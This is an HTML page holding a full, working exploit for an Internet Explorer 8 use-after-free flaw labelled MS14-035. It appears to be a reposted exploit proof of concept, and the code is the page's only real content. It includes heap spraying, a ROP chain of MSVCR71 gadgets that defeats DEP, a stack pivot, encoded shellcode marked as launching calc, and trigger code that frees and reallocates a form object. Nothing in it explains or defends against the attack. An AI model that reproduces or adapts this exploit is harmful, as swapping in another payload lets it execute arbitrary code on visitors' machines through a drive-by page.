|
<html>
<head><title>MS14-035 IE8 Use-after-free Exploit</title></head>
<body>
<div id="mydiv">x</div>
<form id="frm"></form>
<div id="sprayfrm"></div>
<script type="text/javascript">
spraysize = 5000;
sprayelement = document.getElementById("sprayfrm");
sprayelement.style.cssText = "display:none";
var data;
offset = 0x506;
buffer = unescape("%u2020%u2020");
pivot = unescape("%u8b05%u7c34"); // stack pivot
// MSVCR71
rop = unescape("%u4cc1%u7c34"); // pop eax;ret;
rop += unescape("%u10c2%u7c34"); // pop ecx;pop ecx;ret;
rop += unescape("%u2462%u7c34"); // xor chain; call eax {0x7C3410C2}
rop += unescape("%uc510%u7c38"); // writeable loc for lpflOldProtect
rop += unescape("%u5645%u7c36"); // pop esi;ret;
rop += unescape("%u5243%u7c34"); // ret;
rop += unescape("%u8f46%u7c34"); // pop ebp;ret;
rop += unescape("%u87ec%u7c34"); // call eax;
rop += unescape("%u4cc1%u7c34"); // pop eax;ret;
rop += unescape("%ufdff%uffff"); // {size}
rop += unescape("%ud749%u7c34"); // neg eax;ret; {adjust size}
rop += unescape("%u58aa%u7c34"); // add ebx, eax;ret; {size into ebx}
rop += unescape("%u39fa%u7c34"); // pop edx;ret;
rop += unescape("%uffc0%uffff"); // {flag}
rop += unescape("%u1eb1%u7c35"); // neg edx;ret; {adjust flag}
rop += unescape("%u4648%u7c35"); // pop edi;ret;
rop += unescape("%u30ea%u7c35"); // mov eax,[eax];ret;
rop += unescape("%u4cc1%u7c34"); // pop eax;ret;
rop += unescape("%ua181%u7c37"); // (VP RVA + 30 - {0xEF adjustment}
rop += unescape("%u5aeb%u7c35"); // sub eax,30;ret;
rop += unescape("%u8c81%u7c37"); // pushad; add al,0xef; ret;
rop += unescape("%u683f%u7c36"); // push esp;ret;
rop += unescape("%ubc90%u1010%u1010"); // NOP / MOV ESP,0x10101010
// calc
shellcode = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u16ba%u3d14%uddf0%ud9c2%u2474%u5ff4%uc929%u32b1%u5731%u0312%u1257%uf983%udfe8%uf905%ua9f9%u01e6%uc9fa%ue46f%udbcb%u6d14%uec79%u235f%u8772%ud732%ue501%ud89a%u40a2%ud7fd%u6533%ubbc1%ue7f0%uc1bd%uc824%u0afc%u0939%u7638%u5bb2%ufd91%u4c61%u4396%u6dba%uc878%u1582%u0efd%uac76%u5efc%ubb27%u46b7%ue343%u7767%uf780%u3e54%uccad%uc12f%u1d67%uf0cf%uf247%u3dee%u0a4a%uf936%u79b5%ufa4c%u7a48%u8197%u0f96%u210a%ub75c%ud0ee%u2eb1%ude64%u247e%uc222%ue981%ufe58%u0c0a%u778f%u2b48%udc0b%u520a%ub80a%u6bfd%u644c%uc9a1%u8606%u68b6%ucc45%uf849%ua9f3%u024a%u99fc%u3322%u7677%ucc34%u3352%u86ca%u15ff%u4f43%u246a%u700e%u6a40%uf337%u1261%uebcc%u1703%uab88%u65f8%u5981%udaff%u4ba2%ubd9c%u1730%u4163");
/*
_______0x1cc_____
| |
\|/ |
Junk ROP Shellcode Pivot Junk
2 3 1
*/
while (buffer.length < (offset - 0x1cc/2)) buffer += unescape("%u4cc2%u7c34");
buffer += rop;
buffer += shellcode;
while (buffer.length < offset) buffer += unescape("%u4cc2%u7c34");
while (buffer.length < 0x1000) buffer += buffer;
data = buffer.substring(0,offset) + pivot + rop + shellcode
data += buffer.substring(0,0x800-offset-rop.length-shellcode.length-pivot.length);
while (data.length < 0x80000) data += data;
for (var i = 0; i < 0x450; i++) // payload heap spray with corelanc0d3r's DEPS
{
var obj = document.createElement("button");
obj.title = data.substring(0,0x40000-0x58);
//obj.style.fontFamily = data.substring(0,0x40000-0x58);
sprayelement.appendChild(obj);
}
block = unescape( // Literal string to avoid heap allocation
"%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+
"%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+
"%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+
"%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+
"%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca");
blocks = new Array();
for (i = 0; i < spraysize; i++) { // spray 1
blocks.push(document.createElement("button"));
blocks[i].setAttribute("title",block.substring(0, block.length));
sprayelement.appendChild(blocks[i]);
}
for (i = spraysize/2; i < spraysize; i++) { // free some blocks
blocks[i].setAttribute("title","");
}
var newdiv = document.createElement('div');
newdiv.innerHTML = "<textarea id='CTextArea'></textarea>";
document.getElementById("frm").appendChild(newdiv);
var newdiv2 = document.createElement('div');
newdiv2.innerHTML = "<input id='CInput' type='checkbox' onpropertychange='crash()'></input>";
document.getElementById("frm").appendChild(newdiv2);
document.getElementById("CInput").checked = true;
trigger = true;
document.getElementById("frm").reset();
function crash() {
if (trigger) {
document.getElementById("frm").innerHTML = ""; // Free object, trigger bug
CollectGarbage();
for (i = spraysize/2; i < spraysize; i++) { // spray 2
blocks[i].setAttribute("title",block.substring(0, block.length));
}
}
}
</script>
</body>
</html>
|
推荐
评论(0条)
